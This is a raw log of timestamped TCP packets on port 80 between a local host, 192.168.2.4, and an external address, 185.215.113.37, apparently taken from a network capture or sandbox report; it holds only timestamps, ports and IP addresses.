Oct 24, 2024 19:29:18.966922998 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.966938972 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.966963053 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.967266083 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.967282057 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.967308998 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.967325926 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.967339039 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.967355013 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.967370033 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.967381954 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.967396021 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.967416048 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.967420101 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.967436075 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.967456102 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.967468977 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.967518091 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.967654943 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.973047972 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.973103046 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.973118067 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.973123074 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.973141909 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.973164082 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.973650932 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.973692894 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.978791952 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.978806973 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.978822947 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.978842020 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.978873014 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.980556965 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.980598927 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.267653942 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.267760038 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.268028021 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.268044949 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.268062115 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.268088102 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.268120050 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.268171072 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.268181086 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.268189907 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.268199921 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.268214941 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.268243074 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.268343925 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.268357038 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.268384933 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.268402100 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.268418074 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.268433094 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.268444061 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.268454075 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.268460989 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.268465042 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.268481016 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.268502951 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.268587112 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.268599033 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.268608093 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.268618107 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.268625975 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.268629074 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.268640995 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.268651009 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.268661022 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.268662930 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.268676043 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.268703938 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.268768072 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.268779039 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.268788099 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.268800020 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.268810034 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.268810034 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.268820047 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.268831968 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.268835068 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.268842936 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.268884897 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.268886089 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.269035101 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.269046068 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.269056082 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.269066095 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.269087076 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.269093990 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.269097090 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.269105911 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.269131899 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.269136906 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.269148111 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.269157887 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.269169092 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.269174099 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.269181013 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.269195080 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.269196033 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.269217968 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.269229889 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.269435883 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.269445896 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.269454956 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.269465923 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.269475937 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.269478083 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.269485950 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.269495964 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.269509077 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.269526958 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.269540071 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.269594908 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.269617081 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.269627094 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.269634962 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.269635916 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.269646883 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.269656897 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.269663095 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.269668102 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.269679070 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.269689083 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.269690990 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.269700050 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.269701958 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.269710064 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.269720078 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.269723892 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.269730091 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.269733906 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.269742012 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.269752979 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.269759893 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.269764900 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.269783974 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.269804955 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.270323038 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.270335913 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.270344019 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.270354033 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.270364046 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.270373106 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.270375013 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.270382881 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.270385027 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.270396948 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.270406008 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.270414114 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.270417929 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.270417929 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.270426989 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.270437002 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.270440102 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.270453930 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.270464897 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.270473003 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.270473957 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.270473957 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.270483971 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.270494938 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.270498037 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.270507097 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.270517111 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.270525932 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.270526886 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.270535946 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.270539999 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.270550013 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.270558119 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.270559072 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.270574093 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.270580053 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.270581007 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.270586014 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.270591974 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.270601034 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.270623922 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.270634890 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.271306038 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.271322966 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.271336079 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.271349907 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.271361113 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.271363974 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.271370888 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.271382093 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.271392107 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.271395922 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.271403074 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.271405935 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.271414042 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.271433115 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.271439075 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.271451950 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.271461010 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.271466017 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.271473885 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.271478891 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.271485090 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.271501064 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.271512032 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.271512985 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.271524906 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.271536112 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.271538973 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.271545887 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.271552086 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.271564007 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.271574974 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.271578074 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.271585941 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.271596909 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.271608114 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.271609068 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.271619081 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.271620989 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.271631002 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.271644115 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.271651030 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.271655083 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.271675110 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.272077084 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.272093058 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.272262096 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.272274971 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.272284031 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.272294998 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.272305965 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.272315979 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.272315979 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.272326946 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.272337914 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.272344112 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.272349119 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.272361040 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.272366047 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.272371054 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.272377968 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.272386074 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.272397041 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.272408962 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.272418976 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.272433043 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.272439003 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.272444963 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.272458076 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.272461891 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.272485971 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.272491932 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.272499084 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.272510052 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.272517920 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.272521019 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.272532940 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.272543907 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.272553921 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.272555113 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.272566080 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.272578001 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.272588015 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.272591114 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.272599936 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.272603035 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.272613049 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.272620916 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.272635937 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.272664070 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.273092985 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.273106098 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.273117065 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.273128986 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.273139954 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.273144007 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.273154020 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.273166895 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.273169041 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.273169041 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.273199081 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.273272038 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.273283958 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.273293972 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.273305893 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.273310900 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.273317099 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.273335934 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.273340940 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.273353100 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.273364067 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.273364067 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.273372889 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.273376942 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.273387909 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.273400068 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.273403883 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.273411036 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.273422956 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.273428917 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.273431063 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.273437023 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.273447990 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.273458958 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.273471117 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.273471117 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.273482084 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.273487091 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.273493052 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.273505926 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.273510933 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.273523092 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.273535967 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.273550034 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.273574114 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.273982048 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.274069071 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.274197102 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.274209023 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.274218082 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.274230003 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.274240971 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.274244070 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.274252892 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.274264097 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.274275064 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.274279118 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.274286985 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.274291992 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.274298906 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.274301052 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.274310112 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.274317026 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.274322033 CEST	80	49730	185.215.113.37	192.168.2.4
